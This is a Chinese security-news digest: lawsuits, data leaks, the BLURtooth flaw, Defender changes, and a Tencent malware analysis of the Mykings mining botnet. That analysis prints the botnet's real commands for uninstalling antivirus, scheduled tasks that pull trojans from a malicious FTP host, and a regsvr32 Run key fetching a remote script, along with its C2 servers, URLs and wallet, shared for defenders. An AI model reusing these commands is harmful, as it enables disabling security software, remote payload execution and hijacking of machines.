内容转载

= ̄ω ̄= 内容转载

YouTube 在英面临 30 亿美元诉讼:被指非法收集儿童数据

据外媒报道,英国一项新的诉讼称,谷歌的YouTube在知情的情况下在追踪儿童的网络踪迹,这种行为违反了英国的隐私法。据悉,该诉讼代表了超500万名13岁以下的英国儿童及其父母,他们要求赔偿20亿英镑的损失。诉讼则由研究人员和隐私倡导者Duncan McCann向英国高等法院提出的。技术倡导组织Foxglove则对其提供了支持。 起诉书称,YouTube系统性地违反了英国《数据保护法》和欧盟的《GDPR》中有关未成年用户隐私的规定和数据规定,该平台非法收集了数百万名儿童的数据用于广告投放。 Foxglove写道:“我们认为这是非法的,因为YouTube处理了使用该服务的每个孩子的数据–包括13岁以下的孩子。他们从这些数据中获利,因为广告商向他们支付在YouTube网站上投放定向广告的费用。他们做这些都是没有得到孩子父母的明确同意。” 当地时间周一,YouTube的一位发言人拒绝对彭博社发表评论,但表示该视频分享平台不适用于13岁以下的用户。 然而这已经不是谷歌第一次受到跟隐私相关的诉讼了。今年6月,一项50亿美元的集体诉讼在加州法院提起,谷歌被控在用户隐身状态下跟踪用户的浏览器习惯。2019年10月,一桩价值10亿英镑的集体诉讼在英国上诉法院被重新提起。该投诉称,谷歌故意绕过Safari浏览器的安全设置来跟踪iPhone用户。     (稿源:cnBeta,封面源自网络。)

雷蛇意外泄露了超 10 万用户的个人信息

安全研究员 Volodymyr Diachenko 发现,由于服务器配置错误,Razer 网站于 8 月 18 日公开了超 10 万游戏玩家的个人信息。虽然不包括信用卡付款信息,但截图表明该公司的数字商店订单记录被意外曝光,其中包括消费者的电子邮件、邮寄地址、订购的产品类型、以及电话号码等在内的个人信息。 此事耗费了将近一个月来沟通反馈 在网上发现了这一问题后,Volodymyr Diachenko 在三周内与 RAZER 进行了多次接触,最终收到了一份答复。 这家游戏硬件制造商承认服务器存在配置错误,且用户的个人信息可能已被泄露,包括消费者全名、电话号码、以及送货地址等。 不过 Razer 还是辩称,并没有其它铭感数据(例如付款方式)被泄露,且其已于 9 月 9 日修复了错误的配置。 在致外媒 TheVerge 的电子邮件中,该公司同样确认了该问题,并表示任何有疑问的客户,都可以通过 DPO@razer.com 这个邮箱与他们取得联系。 即便如此,Razer 用户仍需警惕这部分泄露信息被用于网络钓鱼活动,因此还请妥善保管线上账户的密码与付款明细。     (稿源:cnBeta,封面源自网络。)

TikTok 已修复 Android 版应用中可能会导致账号被劫持的安全漏洞

据外媒TechCrunch报道,TikTok已经修复了其Android应用中的四个安全漏洞,这些漏洞可能会导致用户账号被劫持。应用安全启动公司Oversecure发现了这些漏洞,这些漏洞可能会让同一设备上的恶意应用从TikTok应用内部窃取敏感文件如会话令牌。会话令牌是一种可让用户登录而无需再输入密码的小文件,如果被盗,这些令牌可以让攻击者在不需要密码的情况下访问用户的账户。 恶意应用将利用这个漏洞向TikTok应用注入一个恶意文件。一旦用户打开应用,恶意文件就会被触发,从而让恶意应用访问并在后台无声地向攻击者的服务器发送偷来的会话令牌。 Oversecure创始人Sergey Toshin告诉TechCrunch,这款恶意应用还可以劫持TikTok的应用权限、允许它访问Android设备的摄像头、麦克风和设备上的私人数据如照片和视频。该公司在其网站上公布了有关漏洞的技术细节。 TikTok表示,在Oversecure报告了这些漏洞后,他们已于今年早些时候修复了它们。     (稿源:cnBeta,封面源自网络。)

微软发布美国大选安全报告 黑客组织活动明显增加

美国总统大选在即,施加给科技公司的压力也越来越大,如何防止恶意组织的干扰是摆在他们面前的难题。在近日更新的官方博文中,微软表示外国黑客组织针对美国总统大选的活动明显增加。 博文中表示,在过去几周时间里对特朗普和拜登的网络攻击明显增加,这些攻击主要来自于三个黑客组织,分别为 Strontium, Zirconium 和 Phosphorus。 2019年9月至今,Strontium 已经影响了超过 200 多家组织,其中包括协助共和党和民主党的美国顾问,以及国内的国家和州党组织等。Strontium 的作案手法包括收割登录凭证以破坏账户。 而 Zirconium 在过去数月里发动了数千次攻击,其中有 150 次成功。微软报道称,Zirconium 在网络犯罪中采取了双管齐下的方式。其中之一是针对与总统竞选活动直接相关的人:拜登竞选活动一直是主要目标,还有至少一名此前参与特朗普政府的个人。该组织策略的第二项是针对参与国际事务的有影响力的人。Zirconium 使用 “网络信标 “来确定目标用户是否有有效的网络存在,并将其用于侦察活动。 去年微软已经对 Phosphorus 该组织进行了打击,在法院的帮助下即将积极努力控制这个组织正在使用的网络域名。在报告中称,Phosphorus曾多次尝试登录特朗普总统工作人员的账户,但都没有成功。 尽管这些黑客组织的活动有所增加,但微软表示,它已经挫败了大多数针对美国大选的企图,并积极通知那些被针对的人。该公司表示。     (稿源:cnBeta,封面源自网络。)

SK 海力士、LG 电子被黑 50GB 机密文件被加密勒索

这年头不管多大的公司,一不小心都有可能被黑客盯上,韩国两大电子巨头SK海力士、LG电子就被黑了,多达50GB机密文件被加密勒索。 据韩媒报道,日前一个勒索组织攻击了LG电子和SK海力士的网站,窃取了大量机密,包括极为机密的商业谈判信息。 具体来说,是这两家公司在美国的办事处被攻击,窃取了电脑硬盘中存储的数据,其中既有员工的个人照片、护照副本等个人信息,也有一些商业信息,比如SK海力士与苹果、IBM等客户进行价格谈判的电子邮件等。 从报道来看,SK海力士主要损失的是2013-2015年间的数据,容量大小约为597MB,而LG电子损失的数据容量高达50.1GB。 这次攻击据悉是一个名为Maze的黑客组织进行的,他们已经在网上发布了一部分信息,任何人都可以访问。 如果LG和SK海力士两家再不交钱赎回,那么后续还会放出更多信息,逼迫这两家公司交钱。 随后LG电子和SK海力士公司回应称,他们已经恢复了系统,并采取了安全措施,不过对于机密数据被泄,以及是否交钱赎回数据,两家公司没有回应。 (稿源:快科技,封面源自网络。)

Mykings 僵尸网络新变种通过 PcShare 远程控制,已感染超 5 万台电脑挖矿

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/wZvnq6gVnEdGSH6f6oG8MA   最新版Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制。Mykings僵尸网络木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。 一、背景 腾讯安全威胁情报中心检测到Mykings挖矿僵尸网络变种木马,更新后的Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制:可进行操作文件、服务、注册表、进程、窗口等多种资源,并且可以下载和执行指定的程序。 Mykings僵尸网络木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。 MyKings僵尸网络最早于2017年2月左右开始出现,该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括DDoS、Proxy(代理服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强,影响范围较广,对企业用户危害严重。根据门罗币钱包算力1000KH/s进行推测,Mykings僵尸网络目前已控制超过5万台电脑进行挖矿作业。 腾讯安全系列产品已支持检测、清除Mykings僵尸网络的最新变种,具体响应清单如下: 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Mykings僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Mykings僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)    Mykings僵尸网络关联的IOCs已支持识别检测; 2)    通过协议特征检测主机挖矿行为; 3)    SQL Server弱口令爆破登陆行为检测; 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)    已支持查杀Mykings僵尸网络相关木马程序; 2)    云主机SQL Server弱口令风险项检测; 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)    已支持通过协议检测Mykings僵尸网络与服务器的网络通信; 2)    通过协议特征检测主机挖矿行为; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀Mykings僵尸网络入侵释放的木马程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 二、样本分析 mykings通过mssql爆破(1433端口)攻击windows服务器,爆破登陆成功后执行Powershell脚本power.txt。Power.txt首先关闭Windows Defender相关功能,然后下载kill.txt清除旧版挖矿程序。 Kill.txt根据进程名匹配旧版挖矿程序,其中标记为“1”代表清除对应的WMI启动项,列表中Mykings常用进程名包括: uihost64.exe、dhelper.exe、msinfo.exe、u.exe、lsmose.exe、lsmos.exe、lsmo.exe、csrw.exe、csrw.exe、lsmosee.exe、lsmma.exe、lsmm.exe、lsmmaa.exe、lsmma.exe、new.exe、upsupx.exe、lsma.exe、lsmab.exe、lsmaaa.exe、lsma30.exe、lsma31.exe 删除旧版WMI事件过滤器“fuckyoumm2_filter”、消费者“fuckyoumm2_consumer”,从而删除WMI启动项。 2.1持久化 Power.txt接着下载uninstall.txt执行,完成卸载杀软、删除旧版挖矿木马、以及通过安装Windows计划任务、RUN启动项、WMI启动项进行本地持久化操作。 1、 卸载指定杀毒软件; wmic.exe product where “name like ‘%Eset%'” call uninstall /nointeractive wmic.exe product where “name like ‘%%Kaspersky%%'” call uninstall /nointeractive wmic.exe product where “name like ‘%avast%'” call uninstall /nointeractive wmic.exe product where “name like ‘%avp%'” call uninstall /nointeractive wmic.exe product where “name like ‘%Security%'” call uninstall /nointeractive wmic.exe product where “name like ‘%AntiVirus%'” call uninstall /nointeractive wmic.exe product where “name like ‘%Norton Security%'” call uninstall /nointeractive cmd /c “C:\Progra 1\Malwarebytes\Anti-Malware\unins000.exe” /verysilent /suppressmsgboxes /norestart 2、安装计划任务“oka”启动新版挖矿木马lsma12.exe,杀死进程java.exe; schtasks /create /tn “oka” /tr “cmd /c start c:\windows\inf\aspnet\lsma12.exe -p” /ru “system” /sc onstart /F wmic.exe process where ExecutablePath=’c:\\windows\\java\\java.exe’ call Terminate 3、安装计划任务”Mysa”、”Mysa2″,在每次系统启动时执行命令,使用账号test密码1433登陆FTP服务器ftp[.]ftp0930[.]host下载木马a1.exe和s1.rar并执行; schtasks /create /tn “Mysa” /tr “cmd /c echo open ftp.ftp0930.host >s echo test>>s echo 1433>>s echo binary>>s echo get a1.exe c:\windows\update.exe>>s echo bye>>s ftp -s:s c:\windows\update.exe” /ru “system” /sc onstart /F schtasks /create /tn “Mysa2” /tr “cmd /c echo open ftp.ftp0930.host>ps echo test>>ps echo 1433>>ps echo get s1.rar c:\windows\help\lsmosee.exe>>ps echo bye>>ps ftp -s:ps c:\windows\help\lsmosee.exe” /ru “system” /sc onstart /F 4、设置拒绝“system”用户访问指定文件和路径; cacls c:\windows\java\java.exe /e /d system cacls c:\windows\temp\servtestdos.dll /e /d system cacls C:\WINDOWS\Fonts\cd /e /d system 5、安装RUN启动项“start”负责下载执行脚本v1.sct,同时删除旧启动项“start1”,删除旧计划任务“Mysa3”、“ok”、“Mysa1”、“my1”。 reg add “HKLM\Software\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f reg add “HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f reg delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v “start1” /f SCHTASKS /Delete /TN “Mysa3” /F SCHTASKS /Delete /TN “ok” /F SCHTASKS /Delete /TN “Mysa1” /F SCHTASKS /Delete /TN “my1” /F 6、继续删除旧版的名称为“coronav”(新冠)的WMI启动项,同时安装新版的“coronav”WMI启动项,在其中通过Powershell下载和执行以下脚本: http[:]//ruisgood.ru/power.txt http[:]//gamesoxalic.com/power.txt 或者通过regsvr32下载和执行脚本: http[:]//ruisgood.ru/s.txt http[:]//gamesoxalic.com/s.txt 7、安装WMI启动项“fuckamm3”、“fuckamm4”启动新版挖矿木马程序: 8、Download.txt负责下载门罗币挖矿程序、Mykings更新程序和安装“暗云”木马感染程序: 2.2自更新 Download.txt下载的ups.dat为自解压程序,解压后释放多个文件到temp目录下,执行竞品挖矿木马清除、挖矿木马下载和启动,以及安装启动项等更新操作。释放的文件包括: c:\windows\temp\ntuser.dat c:\windows\temp\upx.exe %temp%\c3.bat %temp%\excludes %temp%\n.vbs Download.txt 下载的“暗云”木马max.rar会感染MBR执行shellcode,从云端获取Payload并最终获取Mykings相关木马文件。下载Payload网络流量如下: 首先从C2服务器http[:]//95.214.9.95/pld/cmd.txt下载cmd.txt。 然后向服务器(http[:]//95.214.9.95/pld/login.aspx?uid=***&info=***)发送上线信息,参数包括设备标识号uid和info,其中info包括计算机名、出口IP、CPU型号、CPU数量、内存大小信息,info数据经过base64编码,服务器接收数据后返回“AcceptOK”。 2.3 PcShare远控木马 返回数据cmd.txt中指定下载的20200809.rar为PcShare开源远控木马,该木马在github上有多个版本https[:]//github.com/LiveMirror/pcshare。木马下载后被拷贝至: c:\windows\debug\item.dat,启动命令为: rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa。 PcShare可根据服务端指令执行以下多种远控功能,该木马源代码在多个共享平台可供下载,黑客可以随意下载和重新修改编译。 1.枚举、创建、重命名、删除文件和目录 2.枚举和终止进程 3.编辑注册表项和值 4.枚举和修改服务 5.枚举和控制窗口 6.执行二进制文件 7.从C&C或提供的URL下载其他文件 8.将文件上传到C&C 9.执行shell命令 10.显示消息框 11.重新启动或关闭系统 PcShare连接C2服务器:192.187.111.66:5566。 2.4挖矿 Download.txt从地址http[:]//ruisgood.ru/1201.rar下载得到XMRig挖矿程序,从地址http[:]//ruisgood.ru/config2.json下载得到挖矿配置文件,然后启动挖矿进程: c:\windows\inf\aspnet\lsma12.exe 挖矿时使用矿池:xmr-eu1.nanopool.org:14444 门罗币钱包: 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka 查询该钱包,已挖矿获得143个XMR,折合人民币8万余元。而其矿池算力平均为1000Kh/s(盈利100美元/天),可推算约5万台电脑被控制挖矿。 IOCs C&C 192.187.111.66:5566 95.214.9.95 Domain ruisgood.ru ftp.ftp0801.ru gamesoxalic.com ftp.ftp0930.host js.down0116.info js.mys2016.info wmi.1217bye.host js.5b6b7b.ru up.mykings.pw kriso.ru f321y.com down.f4321y.com IP 199.168.100.74 173.247.239.186 174.128.235.243 223.25.247.152 167.88.180.175 139.5.177.10 173.247.239.186 185.239.227.82 URL http[:]//ruisgood.ru/ups.dat http[:]//ruisgood.ru/power.txt http[:]//ruisgood.ru/1201.rar http[:]//ruisgood.ru/uninstall.txt http[:]//ruisgood.ru/max.rar http[:]//ruisgood.ru/config2.json http[:]//ruisgood.ru/s.txt http[:]//ruisgood.ru/upx.exe http[:]//ruisgood.ru/s.xsl http[:]//ruisgood.ru/download2.txt http[:]//ruisgood.ru/batpower.txt http[:]//ruisgood.ru/ups.dat http[:]//ruisgood.ru/download.txt http[:]//ruisgood.ru/kill.txt http[:]//ruisgood.ru/up.txt http[:]//ruisgood.ru/wmi.txt http[:]//ruisgood.ru/batpower.tx http[:]//ruisgood.ru/up2.txt http[:]//gamesoxalic.com/power.txt http[:]//gamesoxalic.com/s.txt ftp[:]//199.168.100.74/aa.exe ftp[:]//199.168.100.74/1.dat ftp[:]//ftp.ftp0801.ru/1.dat ftp[:]//ftp.ftp0801.ru/aa.exe ftp[:]//ftp.ftp0930.host/a1.exe ftp[:]//ftp.ftp0930.host/s1.rar http[:]//js.down0116.info:280/v1.sct http[:]//174.128.235.243/wmi.txt http[:]//174.128.235.243/upsupx2.exe http[:]//174.128.235.243/u.exe http[:]//199.168.100.74/20200809.rar http[:]//199.168.100.74:8074/1201.rar http[:]//173.247.239.186:9999/max.exe http[:]//173.247.239.186:9999/u.exe http[:]//185.239.227.82:8082/2.exe http[:]//wmi.1217bye.host/S.ps1 http[:]//95.214.9.95/pld/cmd.txt http[:]//223.25.247.152:8152/batpower.txt http[:]//167.88.180.175:8175/kill.txt http[:]//167.88.180.175:8175/uninstall.txt http[:]//139.5.177.10:280/psa.jpg http[:]//199.168.100.74/2.exe http[:]//199.168.100.74:8074/2.exe http[:]//173.247.239.186/2.exe http[:]//185.239.227.82:8082/2.exe http[:]//173.247.239.186:9999/2.exe http[:]//js.5b6b7b.ru/v.sct http[:]//js.5b6b7b.ru:280/v.sct http[:]//up.mykings.pw/update.txt http[:]//kriso.ru/java12.dat http[:]//js.ftp0930.host/helloworld.msi http[:]//f321y.com:8888/dhelper.dat http[:]//down.f4321y.com:8888/kill.html md5 20200809.rar dce4ac18798ea897cdc9e09e06b178be max.rar bc7fc83ce9762eb97dc28ed1b79a0a10 u.exe d9c32681d65c18d9955f5db42154a0f3 ups.dat d1f978c88023639d6325805eb562de8c upsupx2.exe b5cd8af63e35db23eb1c6a4eb8244c45 address.txt 83bdb3a6fb995788de262b22919524f1 cloud.txt 6b9b70f4e0c8885d12169045e906d698 cmd.txt 6def7a0c5707f24a912c79f6520ca86f kill.txt 1573ab993edc98decc09423fd82ec5ed micro f0129d85b17ee4d29ef52c63e0e548a4 power.txt 5670f0839333e4b160be05177601b40c uninstall.txt 6092899216610fea5c65e416b34c1777 update.txt 581a86fea2afeb9b9d6d04c9a8f0a5c1 wmi.txt 6afc95f60630a588a7826608c70a60c8 wpd.jpg bbae338b0cac5a2d169b8c535f33bfa0 batpower.txt 40160c782c2a41eed8d8eaf0c706050a up.txt 6c190a44db2118d9c07037d769e0a62d ups.txt f41a8a69361fccc13344493c04a4f0d8 s.ps1 966abd05b7ad1b0b89d2a846f8a5a8f2 testav.dat d4f7a3f44ae3f21863b1440219388a5b psa.jpg 9cb1c1a78ce3efe57eef5f128b43710a 门罗币钱包: 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka 参考链接: https://www.freebuf.com/articles/193260.html https://www.freebuf.com/articles/network/161286.html https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware

蓝牙 BLURtooth 漏洞让攻击者覆盖蓝牙认证密钥

蓝牙无线技术背后的组织今天发布了关于设备供应商如何缓解对蓝牙功能设备新攻击的指南。新发现的BLURtooth是蓝牙标准中一个名为Cross-Transport Key Derivation(CTKD)组件中的漏洞。该组件用于在两个蓝牙功能设备配对时协商和设置认证密钥。 该组件的工作原理是为蓝牙低能(BLE)和基本速率/增强数据速率(BR/EDR)标准设置两套不同的认证密钥。CTKD的作用是准备好密钥,让配对的设备决定他们要使用什么版本的蓝牙标准。它的主要用途是蓝牙 “双模式 “功能。 但根据蓝牙特别兴趣小组(SIG)和卡内基梅隆大学CERT协调中心(CERT/CC)今天发布的安全通告,攻击者可以操纵CTKD组件覆盖设备上的其他蓝牙认证密钥,并允许通过蓝牙连接的攻击者访问同一设备上的其他蓝牙功能服务/应用。 在某些版本的BLURtooth攻击中,认证密钥可以被完全覆盖,而其他认证密钥可以降级使用弱加密。所有使用蓝牙4.0到5.0标准的设备都有漏洞。蓝牙5.1标准带有可以激活和防止BLURtooth攻击的功能。 蓝牙SIG组织官员表示,他们开始通知蓝牙设备的供应商关于BLURtooth攻击,以及他们如何在使用5.1标准时减轻其影响。在撰写本文时,补丁还没有立即可用。防止BLURtooth攻击的唯一方法是控制蓝牙设备配对的环境,以防止中间人攻击,或通过社会工程(欺骗人类操作员)与流氓设备配对。 不过,蓝牙SIG组织预计在某个时间点会有补丁,并且被集成作为固件或操作系统更新提供给蓝牙备。目前,这些更新的时间表还不清楚,因为设备供应商和操作系统制造商通常在不同的时间表上工作,一些设备供应商和操作系统制造商可能不会像其他供应商那样优先考虑安全补丁。 用户可以通过检查固件和操作系统的发布说明,查看CVE-2020-15802,即BLURtooth漏洞的bug标识,来跟踪他们的设备是否已经收到BLURtooth攻击的补丁。根据蓝牙SIG的说法,BLURtooth攻击是由洛桑联邦理工学院(EPFL)和普渡大学的两组学者独立发现的。     (稿源:cnBeta,封面源自网络。)

爱尔兰要求 Facebook 停止向美国传送欧洲用户数据

据外媒报道,爱尔兰数据保护委员会(DPC)要求Facebook停止将用户数据从欧盟转移到美国。《华尔街日报》周三报道称,初步命令已于8月底发出。Facebook证实,爱尔兰DPC已经开始调查其从欧盟向美国传输的数据。这是欧盟公司和居民主要关心的隐私问题。 欧盟法院的决定使得允许企业将欧盟公民数据发送到美国的欧盟-美国隐私盾牌(EU-US Privacy Shield)这一行为失效。Facebook负责全球事务和通信的副总裁Nick Clegg表示,在做出这一决定后,Facebook一直有在阐明他们在如何确保国际数据传输的长期稳定方面的立场。 Clegg在周三的一份隐私声明中说道:“缺乏安全和合法的国际数据传输将损害欧盟经济、阻碍数据驱动业务的增长,就像我们在新冠中寻求复苏一样。”他表示,这可能意味着欧洲的科技公司、医院和大学不能使用美国的云服务提供商或欧盟以外的呼叫中心。“其影响将超出商业领域,还可能影响到医疗和教育等关键公共服务。” 对此,爱尔兰DPC拒绝置评。     (稿源:cnBeta,封面源自网络。)

微软否认 Windows Defender 新功能是一个安全风险

据外媒mspoweruser报道,他们两天前曾报道过Windows Defender增加了通过命令行下载文件的功能。比如MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]。然而有安全研究人员表示担心,新功能增加了Windows 10的攻击能力,它可能会被用来下载恶意二进制文件。 对此,微软现在发表声明回应称:“尽管有这些报告,微软Defender杀毒软件和微软Defender ATP将仍然保护客户免受恶意软件。这些程序可以侦测经由防病毒文件下载功能下载到系统的恶意文件。” 另外微软还表示,该功能不能用于特权升级。 虽然微软否认该功能存在的安全风险,但众所周知,攻击越严重系统的安全性越低。一些用户抱怨称,他们无法通过禁用该新功能来锁定自己的电脑。     (稿源:cnBeta,封面源自网络。)

微软将修改 HOSTS 屏蔽 Win10 遥测数据视作一个严重的安全风险

作为完善 Windows 10 开发的一个重要组成部分,微软希望联网用户允许其上传部分遥测用的系统数据。通常情况下,它会包括 CPU、内存等硬件的基础配置信息,并在传输过程中予以完全的加密。基于分析,微软得以确定系统的安全性和可靠性问题,从而为后续的修复奠定基础。 尽管微软不允许用户彻底禁用遥测收集,但你始终可以清理被 Windows 收集的相关诊断数据。 矛盾的是,虽然遥测被视作 Windows 10 开发所必须、且其它企业也在利用相同的方案来改进其软件,但一些批评人士仍将其视作微软的一项“间谍”行为。 近日,微软为 Windows 10 内置的 Windows Defender(又名 Microsoft Defender)安全软件引入了一项更改。 当检测到用户尝试通过编辑 HOSTS 文件来阻止遥测时,该软件就会发出相应的警告。 维基百科上的资料称,HOSTS 文件被用于辅助网络名称解析(即主机名称到 IP 地址的相关映射)。 但在近日的 Windows 10 更新之后,Microsoft Defender 将特别检查用户的 HOSTS 文件是否已经阻止了微软的遥测服务。 如果尝试编辑 HOSTS 文件以阻止遥测,则会触发 Windows Defender 的这一警告,以阻止用户采取这一措施。 你会注意到对 HOSTS 文件的相关编辑操作将被拒绝保存,且被安全中心标记为“SettingsModifier:Win32 / HostsFileHijack”。 除非点击允许放行,否则这项涉及“严重安全风险”的文件编辑操作将无法继续。当然,这项更新也有助于防止系统文件遭遇其它形式的恶意篡改。     (稿源:cnBeta,封面源自网络。)